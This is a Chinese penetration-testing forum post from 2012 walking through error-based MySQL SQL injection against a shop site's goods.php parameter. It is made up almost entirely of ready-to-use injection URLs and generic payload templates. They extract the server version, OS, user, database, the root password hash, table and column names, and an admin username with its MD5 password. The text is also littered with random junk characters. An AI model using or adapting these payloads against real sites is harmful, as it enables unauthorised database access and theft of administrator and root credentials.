中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号 0 V; a: z0 t4 }; v6 y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" R: `0 E4 M9 R& z
: R# \3 {- U2 K3 a: W; Z
判断系统8 u) b4 g5 a) {) K, S1 Z

0 H. Y/ P. B/ t& e% h+ ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 E4 w/ {5 t7 C6 H' a1 q& G
. n* Z- `9 o) s- h  }& T% s, ]
: Q) o: u2 u! h0 Z+ x# S
( b6 n& f5 {$ b) j- q/ I* n( |
当前 user()
+ W: n: K, |/ W: T, |) x. p9 S$ d8 @$ y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  j( y: k. F  \
, W. s$ c, Q' N8 e6 D

, j# w4 o% Q$ r  x; }
5 m! p% I6 @% W9 F# Q当前 database()
6 i6 F# }, T7 \+ H9 p; ]6 E" s! hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& a0 P& |) ~! ^  b7 A
4 D/ q7 v/ [: G
& Q7 D8 S8 o9 I. z2 S- l- N
0 B& C% A2 l4 c4 _
% P9 S# ^' _" L
root hash: V& w9 t% n9 D

% g5 W/ i8 E6 f2 j* rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 _# R/ _* M' q7 F  V5 L! {4 b) v1 M: r+ l% M8 y7 w: f
9 x: G3 W. X- k0 A

1 i4 F  f1 \  A& m9 O当前 数据库表名' x# M' F! p  ]$ f
& G; u  r) U/ L( ~/ r; K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 O) R+ X  Y3 k' D* I2 O4 n7 `( C: C/ X
# S  A* c4 ?# J+ p+ `7 Q
3 f0 C* G. L3 S( g
# N% f" }6 ]4 V/ D( T当前 数据库 user_name 字段
; ^  D3 D% u: \! d% `4 K/ y2 P4 O5 I3 a& N0 F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% C. C8 ~7 Q3 W  L0 z# r+ O: ~) L5 I7 O) |4 R6 ?
当前 数据库 字段 password" J+ q0 U" P: {1 y9 @& K9 r
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 j3 s& j  ?) P: k1 W  N8 y4 \! o# M% H5 |" o' ]8 j

- h8 Y2 D' d- N6 r( U; S+ k' @+ v
获得 admin passwd(md5)9 w; L# V2 z- {* N4 \( |

0 J( ~+ I3 p( v7 s/ T" C8 m% C% j% Q" K( k& y5 j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 a% r5 Q) {! a9 D! [
+ E% P  W- m" P, P- E! A报错注射
  C, y" q# ~0 O" {% @, L5 ?- R: iSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 v4 L) p1 |5 S( \2 ~4 X) m8 f" ^" T
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)1 ?- O9 v" H$ G$ \
3 y$ _( ^# ^+ [$ S8 R% ^: u
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2